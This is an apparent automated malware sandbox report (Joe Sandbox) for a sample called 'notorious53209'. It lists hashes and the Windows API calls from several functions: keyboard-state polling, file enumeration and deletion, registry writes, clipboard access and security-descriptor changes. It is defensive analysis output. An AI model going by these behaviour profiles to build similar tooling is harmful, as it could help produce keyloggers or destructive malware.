                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                            • API String ID: 3953360268-2428617273
                                            • Opcode ID: 3a36bfd2053e197cbe2355059839b4849b6ad7d334df16dcedc3773e2303491d
                                            • Instruction ID: 3e1a64176d081be80a5ce372e93968ee2b2fbb62c3354da088a6b033ba747331
                                            • Opcode Fuzzy Hash: 3a36bfd2053e197cbe2355059839b4849b6ad7d334df16dcedc3773e2303491d
                                            • Instruction Fuzzy Hash: 42A14CB2528305ABC714EF64CD86DAFB7ECBF95700F400929B586C3191EA74DA58CB62
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0029F221
                                            • _wcscmp.LIBCMT ref: 0029F236
                                            • _wcscmp.LIBCMT ref: 0029F24D
                                            • GetFileAttributesW.KERNEL32(?), ref: 0029F25F
                                            • SetFileAttributesW.KERNEL32(?,?), ref: 0029F279
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0029F291
                                            • FindClose.KERNEL32(00000000), ref: 0029F29C
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0029F2B8
                                            • _wcscmp.LIBCMT ref: 0029F2DF
                                            • _wcscmp.LIBCMT ref: 0029F2F6
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0029F308
                                            • SetCurrentDirectoryW.KERNEL32(002EA5A0), ref: 0029F326
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0029F330
                                            • FindClose.KERNEL32(00000000), ref: 0029F33D
                                            • FindClose.KERNEL32(00000000), ref: 0029F34F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                            • String ID: *.*
                                            • API String ID: 1803514871-438819550
                                            • Opcode ID: c7516a24d56cce0a5226def465fa25fa9911e62b8df06296bcc95c3699977351
                                            • Instruction ID: c0ba416a10735677a0a14d81bb2e361bc2552bf614b7ab303a5dfd11269d45c8
                                            • Opcode Fuzzy Hash: c7516a24d56cce0a5226def465fa25fa9911e62b8df06296bcc95c3699977351
                                            • Instruction Fuzzy Hash: 8D31087691024A6ACF90DFB4ED4CAEEB3AC9F09361F5402B5EC04D3090EB34DA64CA54
                                            APIs
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002B0BDE
                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,002BF910,00000000,?,00000000,?,?), ref: 002B0C4C
                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002B0C94
                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002B0D1D
                                            • RegCloseKey.ADVAPI32(?), ref: 002B103D
                                            • RegCloseKey.ADVAPI32(00000000), ref: 002B104A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Close$ConnectCreateRegistryValue
                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                            • API String ID: 536824911-966354055
                                            • Opcode ID: c2dad6fbe6e35634ba0a5eb68f043db2d8017355145efd3d08dd48eb46bedec0
                                            • Instruction ID: 543c39be6f33461299d1e313a08cc4bf5dd1803322183333143038cb4bd397ae
                                            • Opcode Fuzzy Hash: c2dad6fbe6e35634ba0a5eb68f043db2d8017355145efd3d08dd48eb46bedec0
                                            • Instruction Fuzzy Hash: A7026B752206019FCB14EF14C895A6AB7E5FF89750F04895DF88A9B3A2CB70ED61CF81
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • DragQueryPoint.SHELL32(?,?), ref: 002BC917
                                              • Part of subcall function 002BADF1: ClientToScreen.USER32(?,?), ref: 002BAE1A
                                              • Part of subcall function 002BADF1: GetWindowRect.USER32(?,?), ref: 002BAE90
                                              • Part of subcall function 002BADF1: PtInRect.USER32(?,?,002BC304), ref: 002BAEA0
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 002BC980
                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002BC98B
                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002BC9AE
                                            • _wcscat.LIBCMT ref: 002BC9DE
                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002BC9F5
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 002BCA0E
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 002BCA25
                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 002BCA47
                                            • DragFinish.SHELL32(?), ref: 002BCA4E
                                            • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 002BCB41
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr/
                                            • API String ID: 2166380349-2016967953
                                            • Opcode ID: 81dc582822e5e337836da3b9a97f25f0676f5b95fd92b2511fddb1d5d5b33ab9
                                            • Instruction ID: 2184f947915de74226833437e100b51d24999af08102901b4b6b5b9e071f07f3
                                            • Opcode Fuzzy Hash: 81dc582822e5e337836da3b9a97f25f0676f5b95fd92b2511fddb1d5d5b33ab9
                                            • Instruction Fuzzy Hash: 70615DB1118301AFC711DF50DC89DAFBBE8EF89750F100A2EF591961A1DB70A959CF52
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 0029F37E
                                            • _wcscmp.LIBCMT ref: 0029F393
                                            • _wcscmp.LIBCMT ref: 0029F3AA
                                              • Part of subcall function 002945C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002945DC
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0029F3D9
                                            • FindClose.KERNEL32(00000000), ref: 0029F3E4
                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 0029F400
                                            • _wcscmp.LIBCMT ref: 0029F427
                                            • _wcscmp.LIBCMT ref: 0029F43E
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 0029F450
                                            • SetCurrentDirectoryW.KERNEL32(002EA5A0), ref: 0029F46E
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 0029F478
                                            • FindClose.KERNEL32(00000000), ref: 0029F485
                                            • FindClose.KERNEL32(00000000), ref: 0029F497
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                            • String ID: *.*
                                            • API String ID: 1824444939-438819550
                                            • Opcode ID: ba058e83014a5bea30895eddaf8b008fbdd964f7b7fcb3f76a994e85e9253c76
                                            • Instruction ID: d69190834adf476c3bf37971f5655c632ab3dd8a335f3627f6f18b89e0a275d5
                                            • Opcode Fuzzy Hash: ba058e83014a5bea30895eddaf8b008fbdd964f7b7fcb3f76a994e85e9253c76
                                            • Instruction Fuzzy Hash: 6D31073251025A6BCF90DF64ED88AEEB3AC9F09364F1402B5E910E30A0E734DA64CB64
                                            APIs
                                              • Part of subcall function 00232612: GetWindowLongW.USER32(?,000000EB), ref: 00232623
                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002BC4EC
                                            • GetFocus.USER32 ref: 002BC4FC
                                            • GetDlgCtrlID.USER32(00000000), ref: 002BC507
                                            • _memset.LIBCMT ref: 002BC632
                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002BC65D
                                            • GetMenuItemCount.USER32(?), ref: 002BC67D
                                            • GetMenuItemID.USER32(?,00000000), ref: 002BC690
                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002BC6C4
                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002BC70C
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002BC744
                                            • NtdllDialogWndProc_W.NTDLL(?,00000111,?,?,?,?,?,?,?), ref: 002BC779
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountCtrlDialogFocusLongMessageNtdllPostProc_RadioWindow_memset
                                            • String ID: 0
                                            • API String ID: 3616455698-4108050209
                                            • Opcode ID: 131912f9d19093b7350f7d2ec633c1581e6445d737081e36595aa6b0a00da76c
                                            • Instruction ID: 29fed3d246b17fe6a9e2759828f54aeea4e4721eb96d3b786b12cb3da9d93886
                                            • Opcode Fuzzy Hash: 131912f9d19093b7350f7d2ec633c1581e6445d737081e36595aa6b0a00da76c
                                            • Instruction Fuzzy Hash: 7D81A1705183029FD720CF14D988EABBBE8FB88394F20452EF99597291CB70E915DF91
                                            APIs
                                              • Part of subcall function 0028874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00288766
                                              • Part of subcall function 0028874A: GetLastError.KERNEL32(?,0028822A,?,?,?), ref: 00288770
                                              • Part of subcall function 0028874A: GetProcessHeap.KERNEL32(00000008,?,?,0028822A,?,?,?), ref: 0028877F
                                              • Part of subcall function 0028874A: RtlAllocateHeap.NTDLL(00000000,?,0028822A), ref: 00288786
                                              • Part of subcall function 0028874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0028879D
                                              • Part of subcall function 002887E7: GetProcessHeap.KERNEL32(00000008,00288240,00000000,00000000,?,00288240,?), ref: 002887F3
                                              • Part of subcall function 002887E7: RtlAllocateHeap.NTDLL(00000000,?,00288240), ref: 002887FA
                                              • Part of subcall function 002887E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00288240,?), ref: 0028880B
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0028825B
                                            • _memset.LIBCMT ref: 00288270
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0028828F
                                            • GetLengthSid.ADVAPI32(?), ref: 002882A0
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 002882DD
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002882F9
                                            • GetLengthSid.ADVAPI32(?), ref: 00288316
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00288325
                                            • RtlAllocateHeap.NTDLL(00000000), ref: 0028832C
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0028834D
                                            • CopySid.ADVAPI32(00000000), ref: 00288354
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00288385
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002883AB
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002883BF
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 2347767575-0
                                            • Opcode ID: 965b74db69033dd72edcb7ef5e5f36e1d1abb5df193869343abf8ee9f7608602
                                            • Instruction ID: ea5a0830452e85e54ab9355be3b2ecb7aed85a790fb4126215e38f34c5bd4cb8
                                            • Opcode Fuzzy Hash: 965b74db69033dd72edcb7ef5e5f36e1d1abb5df193869343abf8ee9f7608602
                                            • Instruction Fuzzy Hash: 78616C7591120AABDF00EFA4DD48AAEBBB9FF04700F448669F915A6291DB309A15CB60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$$UCP)$UTF)$UTF16)
                                            • API String ID: 0-3353776154
                                            • Opcode ID: 13001e025dd30d6965c0d0e9859ae75daee9f3189a7e83c8b8085077c000a848
                                            • Instruction ID: b48a101afd21039dc34bc4ae44ad0802d79ccc05ee50e687379fd3e3d49ccfad
                                            • Opcode Fuzzy Hash: 13001e025dd30d6965c0d0e9859ae75daee9f3189a7e83c8b8085077c000a848
                                            • Instruction Fuzzy Hash: C6728075E2121ACBDB18DF58C8847AEB7B5EF48310F14816AE849EB2C0D7709DA1CF91
                                            APIs
                                              • Part of subcall function 002B10A5: CharUpperBuffW.USER32(?,?), ref: 002B10BC
                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002B0737
                                              • Part of subcall function 00239997: __itow.LIBCMT ref: 002399C2
                                              • Part of subcall function 00239997: __swprintf.LIBCMT ref: 00239A0C
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002B07D6
                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002B086E
                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002B0AAD
                                            • RegCloseKey.ADVAPI32(00000000), ref: 002B0ABA
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                            • String ID:
                                            • API String ID: 1240663315-0
                                            • Opcode ID: b910dbb4a5cc8edf4caf59c6cbc135c750c0bd52b5ba619e99c6aaacecb220c9
                                            • Instruction ID: 008c13dffaaecd299e4cfd49daf7c01da9e06e14d9292ab6f4edc3e115f23f86
                                            • Opcode Fuzzy Hash: b910dbb4a5cc8edf4caf59c6cbc135c750c0bd52b5ba619e99c6aaacecb220c9
                                            • Instruction Fuzzy Hash: F3E17C71214201AFCB15DF28C884E6BBBE4EF89754F04896DF58ADB2A2DA30E911CF51
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00290241
                                            • GetAsyncKeyState.USER32(000000A0), ref: 002902C2
                                            • GetKeyState.USER32(000000A0), ref: 002902DD
                                            • GetAsyncKeyState.USER32(000000A1), ref: 002902F7
                                            • GetKeyState.USER32(000000A1), ref: 0029030C
                                            • GetAsyncKeyState.USER32(00000011), ref: 00290324
                                            • GetKeyState.USER32(00000011), ref: 00290336
                                            • GetAsyncKeyState.USER32(00000012), ref: 0029034E
                                            • GetKeyState.USER32(00000012), ref: 00290360
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00290378
                                            • GetKeyState.USER32(0000005B), ref: 0029038A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: 0460de0f4d48499404c98df0c34a8715bc92ddd659e2b2495f45e044d6848cc2
                                            • Instruction ID: 0da543800fbca3d3d27767639b5306f498b15260646bb2ae7c1f597c0fbbf086
                                            • Opcode Fuzzy Hash: 0460de0f4d48499404c98df0c34a8715bc92ddd659e2b2495f45e044d6848cc2
                                            • Instruction Fuzzy Hash: A441FB209247CF6EFF714F6488883A5BEA0AF11340F4881DDD9C5461C2D7945DE4C7A6
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                            • String ID:
                                            • API String ID: 1737998785-0
                                            • Opcode ID: eb46c2ec4cbdeafaf5e20ec197b0dd8b7f2b7d9b0586630b886ce2ca6d9dcbf8
                                            • Instruction ID: c5371d93bf31396609878391f9f9e6ad51fe536f903dadb8a1076123c2c1f392
                                            • Opcode Fuzzy Hash: eb46c2ec4cbdeafaf5e20ec197b0dd8b7f2b7d9b0586630b886ce2ca6d9dcbf8
                                            • Instruction Fuzzy Hash: 4B21BF392202119FDB10AF64FD0DB6977A8EF45321F10812AFD46DB2A1DBB0EC10CB54
                                            APIs
                                              • Part of subcall function 002348AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002348A1,?,?,002337C0,?), ref: 002348CE
                                              • Part of subcall function 00294CD3: GetFileAttributesW.KERNEL32(?,00293947), ref: 00294CD4
                                            • FindFirstFileW.KERNEL32(?,?), ref: 00293ADF
                                            • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00293B87
                                            • MoveFileW.KERNEL32(?,?), ref: 00293B9A
                                            • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00293BB7
                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00293BD9
                                            • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00293BF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                            • String ID: \*.*
                                            • API String ID: 4002782344-1173974218
                                            • Opcode ID: a8becdfa2c9c91d25f89870997c6853cebda0c21b7d6e80ec95124f0a223cc9e
                                            • Instruction ID: ca9f527d133911fd943c965a3e06f290678696c7c0b7df7df53276e3694e0edb
                                            • Opcode Fuzzy Hash: a8becdfa2c9c91d25f89870997c6853cebda0c21b7d6e80ec95124f0a223cc9e
